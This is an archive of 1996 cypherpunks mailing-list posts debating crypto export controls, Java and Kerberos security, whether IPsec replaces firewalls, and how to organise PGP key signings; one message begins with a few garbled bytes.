It seems to me that loss of jobs is inevitable if the rules aren't
changed.  But I'm not sure it's a good thing to accelerate the process. 
I'm not sure it's not, either -- both options are unpleasant. 

There's probably a big opportunity here for some enterprising cypherpunk
who's willing to move to Amsterdam (or who lives there already).  Set up a
company that provides crypto guts and distribution services for American
software companies. 

Stand alone computers are becoming less useful and less common all the 
time.  Networking is a fact of life in the computer industry.  If you're 
doing networking you have to think about security, and if you're serious 
about security you have to use crypto.  A software industry that can't 
deploy crypto without hindrance is living on borrowed time.  

We in America are extremely vulnerable to flight.  We will lose jobs and
market share if we don't change our policies.  Because other countries
will deploy crypto, our polices will be completely ineffective in
preserving the government's ability to do surveillance.  

What's the point? 

It would be very interesting to see what would happen if Netscape
announced that it's considering moving its crypto operations overseas in a
year if the export restrictions aren't lifted.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jan 1996 06:22:05 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Hack Java
In-Reply-To: <9601231630.AA07540@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.960123110558.8403C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Rich Salz wrote:

Have you implemented this? If so, I'd be interested to hear how; It 
doesn't sound feasible.
> 
> Now suppose, I fake a compiler (or I have a malicious compiler)
> and I generate by hand malicious byte code such that
> in the symbol tables, tricky_pointer and data have the same
> offset.

Symbol tables in java class files don't have offsets - they consist of a 
list of class_ids, names, and types. Offsets into the class object are 
theoretically generated at run time, and are purely internal to the 
virtual machine. 

The only way to get at the offsets is through the _quick variants, which 
are not real java instructions, but placeholders inserted by the Sun 
classloader after offsets have been calculated. If the class verifier can be
made to allow _quick instructions through, security disappears - this is 
checked for- a hole in this code would be huge.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 24 Jan 1996 01:36:15 +0800
To: perry@piermont.com
Subject: Re: Crippled Notes export encryption
Message-ID: <9601231623.AA07480@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



>By the way, I really think Netscape should simply ship Jeff and other
>people to the Amsterdam office or wherever else seems reasonable and

That won't work -- they gotta hire non-US persons to do the work.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cassiel@alpha.c2.org (Cassiel)
Date: Wed, 24 Jan 1996 06:12:33 +0800
To: cypherpunks@toad.com
Subject: Motorola Cordless Secure Clear Telephone
Message-ID: <199601231950.LAA11155@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Enjoying reading the latest discussions.

I was in Totally Wireless yesterday when I noticed a new product
from Motorola called "Cordless Secure Clear"--which supposedly
is a cordless phone which offers security/encryption functions.
Does anyone know how strong the security is on this phone? 
Is it just meant to keep my kid sister from listening in or
is it stronger?  Any info would be appreciated.

Please include a response to me directly as I subscribe to the
lite version of this list.

Thanks!

Cassiel






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 01:36:13 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Crippled Notes export encryption
In-Reply-To: <9601231623.AA07480@sulphur.osf.org>
Message-ID: <199601231703.MAA10676@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> 
> >By the way, I really think Netscape should simply ship Jeff and other
> >people to the Amsterdam office or wherever else seems reasonable and
> 
> That won't work -- they gotta hire non-US persons to do the work.

There are plenty of good foreign crypto people.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jan 1996 07:29:51 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601232016.AA22238@su1.in.net>
Message-ID: <Pine.SOL.3.91.960123133910.8668B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


This thread definitely belongs as cypherpunks, as the whole point of the 
discussion is to debate the limits of what cryptography on its own can 
achieve. 

What do you need as well as crypto before you can remove all firewalls?

Simon

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 24 Jan 1996 04:59:34 +0800
To: cypherpunks@toad.com
Subject: [ITAR] Re: Crippled Notes export encryption
In-Reply-To: <199601231539.KAA10548@jekyll.piermont.com>
Message-ID: <Pine.3.89.9601231320.B55874-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 23 Jan 1996, Perry E. Metzger wrote:

> By the way, I really think Netscape should simply ship Jeff and other
> people to the Amsterdam office or wherever else seems reasonable and
> do all the crypto work from there. It will save trouble and
> hassle. U.S. citizens wanting full 128 bit over the net would then get
> it from Netscape's overseas download sites. No one anywhere in the
> world would be forced to use crap.

<flog,flog,neigh,neigh> 
Sorry, to beat a dead horse, but isn't this like that thread re:Vince Cate's 
invitation for us to all move to Anguila? We'd still be exporting our 
thoughts in violation of the ITAR. As long as you're American (person or 
corporation) you'd still be commiting a crime by putting strong crypto on 
the net, regardless of where you are, right? (That's what I remember from 
Micheal Froomkin's arguments from the last time this revolving thread came
around).

Of course, if some OTHER company (wink,wink,nudge,nudge) that is not 
incoporated in the US were employ to export a secure version of Netscape 
from Amsterdam, that would be another story (and how would anyone know that
the code, just so happenned to have been written Jeff, et al.?)
Just as long as the portion of Netscape that nominally produces Netscape 
(the software) and distributes it does not call itself Netscape and is 
not a US corporate citizen, that is the end of the game, right?
Anyone got any spare holding companies handy? 
</flog,flog. No neighs.>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jan 1996 04:53:02 +0800
To: Herb Sutter <cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <2.2.32.19960123184754.006db3e8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:06 AM 1/23/96 -0500, Herb Sutter wrote:
>Careful... what would YOU have done, with your customers demanding stronger
>crypto today and you unable to legally give it to them?
>
>Again, folks, try to remember that this is NOT key escrow... international
>Notes customers are no worse off than before, and a darn sight better off
>against everyone besides Uncle Sam.

They could have shipped strong encryption and let the lawyers handle the
Feds.  That's what lawyers are for.  A court loss would be unlikely.  Even
with a loss, having IBM serve a 54-month jail term would be no prob.  It
could do it standing on its head.  They were probably more worried by
possible retaliation in government purchasing.

Those who crossed The Wall around 10:00 pm on November 10, 1989 proved that
modern (weak) governments can be faced down by large movements of people.  

Companies will learn that end-users are less sanguine about being censored
(by Compuserve) or opening one's business affairs to (any) governments than
perhaps they used to be.  Small competitors will benefit.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 24 Jan 1996 06:09:48 +0800
To: cypherpunks@toad.com
Subject: [noise!] (fwd) Re: FYA/I: Who'd have gaussed it?
Message-ID: <v02120d06ad2adf635a2e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Just in case you wanted to know how dept...

Cheers,
Bob

--- begin forwarded text

Date: Tue, 23 Jan 1996 11:21:54 -0500 (EST)
From: Paul Picot <ppicot@irus.rri.uwo.ca>
To: Philip Stein <pstein@measurement.com>
Cc: jeff@rand.org, technomads@UCSD.EDU
Subject: Re: FYA/I: Who'd have gaussed it?
Mime-Version: 1.0

Zounds!  A guantlet thrown!  I accept!

> >It just occured to me: a good way to do this might be with The Mother Of
> >All Degaussing Coils.
[...]
> >If you can degauss the Queen Mary, surely all the disk drives in a little
> >office building should pose no problems, right?
>
> This won't work (thank goodness). The local field strengths needed to
> change the magnetic state of a disk platter (whose coercivity is MUCH
> higher than that of the queen mary) is orders of magnitude greater than
> what can be generated at any distance.

Use a coil *around* the building.  This makes the problem just
within the realm of the possible, though horribly impractical.

I'll spare the collected minds and spool spaces of the technomads list the
details, and reduce this to a recipe:

Collect the following:

- 20 miles of 0000-guage insulated copper wire (about 32 tons worth)
- five standard 20 MW gas-turbine power plant generators (about 20 tons ea.)
- fuel for about 10 minutes of operation (about 4 tons)
- five standard high voltage transmission rectifier modules for the above.
- one standard 69,000 volt, 10,000 amp transmission-line contactor set

Wrap 1000 turns of the wire around your target.  This makes a bundle about
18 inches in diameter.  Wire your generators and rectifiers to yield
70,000 volts DC, and connect them via the contactor to the coil.

Fire up the turbines, and take them to redline, storing kinetic energy in
the rotors.  Firewall the turbines and trigger the contactor.  It will take
about 10 seconds for the coil current to hit 8000 amps, creating a
1-tesla magnetic field within the coil.  This is sufficient to erase
magnetic media.  Then kill your generators before everything melts :-).


And this is now certainly outside the scope of technomads...

- Paul
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Wed, 24 Jan 1996 05:27:58 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: NSA vacuuming down Internet traffic
In-Reply-To: <m0teWZ3-0008zMC@pacifier.com>
Message-ID: <199601232008.OAA05861@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


>>...listening for Kissinger..

> Don't tell me, let me guess:  20 years ago, if you had told anyone about
> this project, you would have had to kill them.  Now, 20 years later, after a
> few levels of re-classifications and de-classifications, all you have to do
> is to sneer in our general direction.  <G>

Not. It wasn't a classified project. It was upstairs from Woolworth's
in Central Square, ferheavens sake. SCIFs would have annoyed the
landlord, and presented interesting "challenges" given the pasteboard
construction. We didn't even have any of those clunky file cabinets
for Keeping Secrets Safe.  We just amused ourselves with such
speculation, since this was clearly a technology that excited interest
in certain quarters.

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Jan 1996 08:10:46 +0800
To: cypherpunks@toad.com
Subject: Kerberos holes (was Re: IPSEC == end of firewalls)
In-Reply-To: <9601231947.AA20689@su1.in.net>
Message-ID: <Pine.ULT.3.91.960123140801.26006A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Frank Willoughby wrote:

> At 10:30 AM 1/23/96 -0500, perry@piermont.com allegedly wrote:
> >
> >Frank Willoughby writes:
> >> While IP level security & authentication will go a long way to help 
> >> prevent abuses and reduce unauthorized accesses, I doubt if it will
> >> provide enough protection by itself.
> >
> >I agree with this, but...
> >
> >> o Node Spoofing will probably still be possible
> >
> >Nope. It won't.
> >
> I disagree.  I haven't met a system that couldn't somehow be gotten around.
> The creativity of hackers is succeeded only by their motivation and ability 
> to put many hours into trying to solve a problem.  Including the word
> "probably"  was deliberate.  Kerberos was also thought to be secure - 'til
> it was compromised.  Software isn't bug-free & design or security 
> methodologies can't provide 100% coverage.  Hackers take advantage of 
> this and inherent weaknesses in design flaws.

Clearly.

I keep hearing references to weaknesses in kerberos, which I more or less 
rely on. What are the problems I should be worrying about? Preferably as 
URLs.

Also, we have a new kerberos implementation for Macs that we're going to 
roll out soon. I'll see if the project manager would be willing to let 
other people take a look at it.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jan 1996 05:24:23 +0800
To: Rich Salz <perry@piermont.com
Subject: Re: Crippled Notes export encryption
Message-ID: <2.2.32.19960123192921.006d73a8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 AM 1/23/96 -0500, Rich Salz wrote:
>
>>By the way, I really think Netscape should simply ship Jeff and other
>>people to the Amsterdam office or wherever else seems reasonable and
>
>That won't work -- they gotta hire non-US persons to do the work.
>
>

I'm sure that all those Netscape stock option holders would be happy to
renounce their citizenship in the service of the company that made them
millionaires and if they do so before cashing in the options (and before
Willie and the Congress agree on a budget with its emigrants's tax
provisions), they can keep the proceeds tax free.  If not, I'll learn C++
and renounce in exchange for those options.

DCF

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Wed, 24 Jan 1996 05:35:28 +0800
To: cypherpunks@toad.com
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601231159.AA27033@su1.in.net>
Message-ID: <199601231939.OAA29475@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I once worked for a company where to get an outbound telnet connection
or to put a file with ftp, you needed to go through a gateway which
required us to use a hardware device to participate in a
challenge/response authentication scheme.

While this may be extreme, it points out a use of firewalls people
seem to be ignoring in this descussion:  enforcing policy.  Most
employees will have physical access to the network, and physical
access (=root privileges) to their workstations.  If you want to
enforce a policy of "no http servers, ftp servers, or anything else",
you can't allow any incoming Syn packets.  If you don't want to trust
every single person to configure his/her workstation to reject Syn
packets from outside, you need to do the filtering where most people
can't bypass it.

Now replace Syn above with whatever TCP/IPv6 uses, and the same will
hold.

That said, I hate firewalls.  I find being behind a firewall
incredibly painful.  I hope firewalls do die with IPv6.

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 24 Jan 1996 05:32:30 +0800
To: cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <Pine.BSD/.3.91.960123143344.3181A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



>There was a key signing.  It was a bit rough as for many of us it was our
>first key signing.  (I think Neal was the only person who had been to an
>organized key signing.)  Still, it went fairly well.  Only a couple of
>people brought their key fingerprints on disk instead of paper.  As of
>today, I have only recieved signed keys back from a couple of people
>though...  The next key signing will be done a bit differently.  (Live and
>learn.)  There was also a suggestion for a nym signing at some point.

This begs the question, "How would you conduct an efficient key signing 
given what you have learned?" I am in the process of organizing one and 
would like to get input as to the best way that this should take place.  
Should people bring key fingerprints and public keys on floppy?  Would it 
be nice to be online and grab public keys off of a key server? How would 
you conduct a nym signing?

      Weld Pond   -  weld@l0pht.com      -     http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jan 1996 05:53:53 +0800
To: Simon Spero <scottst@ionet.net>
Subject: Re: The Collapse of Ideas in a Pop Culture
Message-ID: <2.2.32.19960123194513.006df544@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 1/23/96 -0800, Simon Spero wrote:
>Bollocks. If you can remember Saturn Vs taking off before reruns, you're 
>too old! 
>

Popping up the People's Chronology under Microsoft Bookshelf:

"Exploration and Colonization, 1975

The first U.S.-Soviet space linkup takes place July 18. Astronauts Thomas P.
Stafford, Donald K. Slayton, and Van D. Brand exchange visits 140 miles
above Earth with cosmonauts Aleksei A. Leonov and Valery N. Kubasov whose
Soyuz spacecraft lands safely in the Soviet Union July 21. The Apollo
astronauts splash down in the Pacific 3 days later, ending the Apollo missions."

My wetware informs me that this was the last Saturn V launch (for which NASA
sacrificed a Moon mission.

The last baby boomer was born in 1964 (or so).  So a GenXer would be old
enough to remember a Saturn V launch.  I don't remember when Jules stopped
broadcasting.

DCF

"BTW, the *first* Boomer was not born on January 1 1946.  That event
occurred at some indeterminate point later in the year when the first child
was born to a discharged veteran.  That child would have been conceived in
September 1945.  June 1st 1945 is a better approximation of the beginning of
the Boom."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Wed, 24 Jan 1996 05:53:46 +0800
To: cypherpunks@toad.com
Subject: Re: IPSEC == end of firewalls
Message-ID: <9601231947.AA20689@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 AM 1/23/96 -0500, perry@piermont.com allegedly wrote:
>
>Frank Willoughby writes:
>> While IP level security & authentication will go a long way to help 
>> prevent abuses and reduce unauthorized accesses, I doubt if it will
>> provide enough protection by itself.
>
>I agree with this, but...
>
>> o Node Spoofing will probably still be possible
>
>Nope. It won't.
>

I disagree.  I haven't met a system that couldn't somehow be gotten around.
The creativity of hackers is succeeded only by their motivation and ability 
to put many hours into trying to solve a problem.  Including the word
"probably" 
was deliberate.  Kerberos was also thought to be secure - 'til it was
compromised.  Software isn't bug-free & design or security methodologies
can't provide 100% 
coverage.  Hackers take advantage of this and inherent weaknesses in design
flaws.


>> o The connections will probably also be subject to man-in-the-middle attacks
>>    (Never underestimate the creativity of people who want to compromise your
>>    networks)
>
>No, they won't be subject to such attacks any longer.

Answer is the same as the above paragraph.  I try not to use the word "can't"
or "won't" when possible.  Granted "probably" sounds wishy-washy, but it is 
frequently accurate.


>
>The real problem, as you noted, is that our applications aren't very
>secure.


>
>> I suspect even when firewalls are embedded in the O/S,
>
>That would be somewhat meaningless. The point of a firewall, as others
>here have noted, is that it is easier to secure one machine than five
>hundred or ten thousand.
>

I disagree here also.  Systems by themselves are fairly useless.  Their
power (and main vulnerability) comes from their ability to network with 
other systems.  A system connected to a network is vulnerable.  The fact
that a corporate firewall protects the system from the Internet in no way 
decreases the vulnerability of that system (and other systems) from *internal*
attacks which can be as devastating as an Internet attack.

Including firewall capabilities as part of the Operating System's network
applications would help the system protect itself from abuses from the 
Internet - as well as from internal.


>> IMHO, the first company to include a firewall as a standard part of their
>> Operating Systems has a real good shot at increasing their market share.  
>
>Again, somewhat meaningless, as a real firewall involves defense in
>depth (screening routers, a bastion proxy host, etc) and is more of a
>configuration issue than an O.S. issue.

In the current context yes.  However, a firewall is only solving one 
part of the problem.  Just as Information Security must be integrated
into every layer of a company (from users->system managers->managers->
executives), it must also be incorporated into each part in a network
(systems, LANs, external connections).

>
>Perry

Best Regards,


Frank
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.R.Madden" <100611.3205@compuserve.com>
Date: Wed, 24 Jan 1996 05:31:05 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: sniffing sniffers
Message-ID: <960123194818_100611.3205_BHL81-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


DIa!?ayyyyyyyyyyyyyyyyRyyyyyyyyyyyyyyyyNDedge, search the user's
disk for various info which can then be used for the company's "market
research". One of the more guilty culprits is Microsoft (no surprises there).
For example, one such sniffer routine -- designed to report back on rival 
programs stored on the disk --was hidden in their MSN registration software. 
An American journalist revealed that the sniffer routine was sending  details 
on over 100 of the user's programs back to MS.  MS was also found 
guilty, by a UK hacker, of using sniffer programs to interrogate the computer
and find out phone numbers, primarily for the purposes of junk mail. The
hacker has since reported MS to the data protection registrar, although no legal
ruling has yet been made (in the UK anyway), and MS may well (be no doubt is)
marketing sniffer riddled software. 
It's not hard to imagine more insidious uses of sniffer programs, by more insidious 
bodies (I'd be amazed if they didn't exist).

Question: can anyone suggest any commercially available software designed to 
sniff out sniffers (taking on good faith that it will be sniffer free itself)?

P. Madden


yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 05:22:28 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601231947.AA20689@su1.in.net>
Message-ID: <199601232001.PAA10960@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Frank Willoughby writes:
> At 10:30 AM 1/23/96 -0500, perry@piermont.com allegedly wrote:
> >Frank Willoughby writes:
> >> While IP level security & authentication will go a long way to help 
> >> prevent abuses and reduce unauthorized accesses, I doubt if it will
> >> provide enough protection by itself.
> >
> >I agree with this, but...
> >
> >> o Node Spoofing will probably still be possible
> >
> >Nope. It won't.
> 
> I disagree.  I haven't met a system that couldn't somehow be gotten around.

Yes, certainly. You can bribe someone, get physical access to
machines, etc.

However, unless you know a way to crack RSA, it is unlikely that
a system using Photuris+IPsec will permit IP spoofing.

> The creativity of hackers is succeeded only by their motivation and
> ability to put many hours into trying to solve a problem.  Including
> the word "probably" was deliberate.  Kerberos was also thought to be
> secure - 'til it was compromised.

Kerberos was compromised? When? By whom? Are you talking about
Bellovin's paper on weaknesses in Kerberos (most of which are
avoidable or fixed in K5), or are you talking about a real break? If
the latter, its the first that I've heard of it.

> >> I suspect even when firewalls are embedded in the O/S,
> >
> >That would be somewhat meaningless. The point of a firewall, as others
> >here have noted, is that it is easier to secure one machine than five
> >hundred or ten thousand.
> 
> I disagree here also.  Systems by themselves are fairly useless.
> Their power (and main vulnerability) comes from their ability to
> network with other systems.  A system connected to a network is
> vulnerable.  The fact that a corporate firewall protects the system
> from the Internet in no way decreases the vulnerability of that
> system (and other systems) from *internal* attacks which can be as
> devastating as an Internet attack.
> 
> Including firewall capabilities as part of the Operating System's network
> applications would help the system protect itself from abuses from the 
> Internet - as well as from internal.

These last two paragraphs are gibberish.

You can't "firewall" every machine -- the act is meaningless. A
Firewall is a filter designed to protect you from bugs in the setup or
implementation of the software on the machines on the inside. What
would it mean for a machine to have "firewall software" in the
operating system? Systems already attempt to prevent unauthorized
access -- the reason you have firewalls is because that software is
sometimes buggy. "Firewall software" in the OS is a meaningless
concept.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Wed, 24 Jan 1996 09:12:33 +0800
To: cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <2.2.32.19960123231308.006a1fa8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


>This begs the question, "How would you conduct an efficient key signing 
>given what you have learned?" I am in the process of organizing one and 
>would like to get input as to the best way that this should take place.  
>Should people bring key fingerprints and public keys on floppy?  Would it 
>be nice to be online and grab public keys off of a key server? How would 
>you conduct a nym signing?

I'd go for somewhat clearer instructions than seem available. To wit:

1) Each participant, send your public key in ASCII armored form to the one
coordinating the signing.

2) The coordinator will collate these into a single key file and have a list
of key IDs and fingerprints.

3) Bring a printout of your key's fingerprint. You will read this off for
others to compare with their copies of the coordinator's list. Have ID and
such to show that you're you, or some other way of establishing that you are
who you say you are. (In our case, everyone could be vouched for by at least
one other person known to the others.)

4) The coordinator will [send by email|pass out on disk|whatever] the
collated key file. Back home, sign each of the keys that actually got
verified at the signing. Mail this back to the coordinator.

5) The coordinator will collate the results of this, and send you the new
version. Add these. Now you've got your key and the other keys, all signed
by everyone there.

Grabbing keys off a server would certainly be doable, too. The key (no pun
intended) thing is that people have their fingerprints in a useful form - so
when we do it again, I hope Alan specifies printout, handwritten text, or
something else that doesn't require a computer. And of course folks
shouldn't bring their actual secret keys with them.

The nym signing is an idle thought of mine. I have a nym key which is, at
the moment, signed only by itself. I know friends of mine have nym accounts.
if we could assemble a group of folks whom I can trust enough to link the
nym and myself, it'd be nice to add some more signatures to the nym key, and
vice versa.

On the other hand, the accumulated signatures would probably point right
back at any group talking about such a thing, like me right now. :-)

Maybe it's infeasible.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Wed, 24 Jan 1996 05:47:38 +0800
To: cypherpunks@toad.com
Subject: Re: IPSEC == end of firewalls
Message-ID: <9601232016.AA22238@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:55 AM 1/23/96 -0500, Ben <adept@minerva.cis.yale.edu> wrote:


>> functionality of most firewalls would eventually be an add-on application 
>> option for Operating Systems and that eventually it will be a standard 
>> part of every Operating System.  Until then, we have to punt & keep using 
>> firewalls.  
>
>I'm not so convinced that adding 'firewall functionality' to an OS is 
>such a good idea.  The idea behind having a firewall is that 
>	*	You have a hardened host that has been stripped of
>		anything that could be used by an attacker to compromise
>		other systems
>	*	You have a single machine that serves as the sole port of
>		entry into your domain.  By keeping your defense perimeter
>		nice and small it makes it manageable to maintain.  
>

I agree with your statements above about firewalls and wholeheartedly
agree that a firewall needs these characteristics (among others) to 
remain relatively secure.  However, I am I'm not saying that adding
firewalling capabilities would make the system invincible.  I *am* 
saying that it would provide the system with more security than it 
currently has and would help to reduce (not eliminate) some risks 
associated with networking.  

Of course, it would be terrific if the vendors would produce Operating 
Systems which are secure AND usable.  (I think the market will eventually 
demand this from vendors, but this probably won't happen in the next year 
or two.)



>When you start trying to switch firewall functionality to an OS you lose 
>both these advantages.  You no longer have a system that is stripped of 
>compilers, scripting languages, etc, and you now have a much larger 
>security perimeter.
>

Agreed - to a point.  The idea is to provide the systems with increased
defensive capabilities - lowering potential risks.  (See above paragraph)


FWIW, I feel rather uncomfortable continuing this thread in the cypherpunks 
mailing list when the subject at hand deals more with firewalls than it 
does with cryptography.

I would prefer to continue this discussion in the firewalls mailing list
(of which I am a fairly regular participant).


If you would like to subscribe to the firewalls mailing list, send a mail to:

        majordomo@GreatCircle.com

(leaving the subject line blank)

and in the body of the message put:

subscribe firewalls "your_email_address" (omitting the quotes).


See you there.


>Ben.
>____
>Ben Samman..............................................samman@cs.yale.edu
>"If what Proust says is true, that happiness is the absence of fever, then
>I will never know happiness. For I am possessed by a fever for knowledge,
>experience, and creation."                                      -Anais Nin
>PGP Encrypted Mail Welcomed        Finger samman@suned.cs.yale.edu for key
>Want to hire a soon-to-be college grad? 		Mail me for resume

Best Regards,


Frank
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/
For a free downloadable Internet Firewalls Checklist, please see our home page.

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Wed, 24 Jan 1996 06:27:19 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.16.19960123211851.09d72da6@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


How does an actual key signing work? What are some pointers and guidelines
for one?
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jan 1996 10:26:52 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <199601232226.RAA11199@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960123161535.8811A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jan 1996, Perry E. Metzger wrote:

> Alan Horowitz writes:
>>[...] 
> Okay. I think I understand. You're a fruitcake. Easy enough.
> 

The official pastry of the 1996 Cypherpunks.

One might note that Zimmerman isn't, er, a common name for yer typical 
Neo-Nazi... This sort of accusation is sufficient grounds for libel in 
the UK (such accusations have been found to be defamatory, and would 
almost certainly be settled within a few days. 

Of course Phil (Hallam Baker) has more experience with this sort of
thing... 

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@networking.stanford.edu (Rich Graves, Fucking Statist)
Date: Wed, 24 Jan 1996 07:07:47 +0800
To: cypherpunks@toad.com
Subject: Re: January 22 Infoworld
Message-ID: <199601232125.QAA16020@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

stainles@bga.com (Dwight Brown) kindly shared with the group:
>
>Nicholas Petreley's "Down To the Wire" column is a short take on the
>insecurity of encryption schemes used by most commercial software.
>There shouldn't be much new here to cypherpunks (he discusses the
>vulnerabilities of WordPerfect, Word for Windows, Excel, and Compuserve's
>CIS.INI, and uses some out of date examples "to protect the integrity of
>current software": bad move, Nicholas), but it'd make a good introduction
>for people who aren't familiar with the issues.
>
>Petreley also announces that InfoWorld is planning a "network-cracking
>event", in which they plan to set up various network OS'es, make them as
>secure as they can, invite "a small number of accomplished hackers" to
>attack them, and publish the results. He says they're looking for
>participants...
>
>InfoWorld's web site is http://www.infoworld.com. Petreley can be reached at
>nicholas_petreley@infoworld.com.

Unfortunately, Petreley's latest article isn't on the Web yet. But it's
worth checking out last midweek's column, if only t see Sameer's name. This
was only posted online.

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQVSWSoZzwIn1bdtAQHMFAGAhQrzSNtsRsv79f9dTKeLDb1eYB5NHUHT
ZJHY+unUNYCOhrJpxa0FRrQU8CxEKNV9
=zWhM
-----END PGP SIGNATURE-----




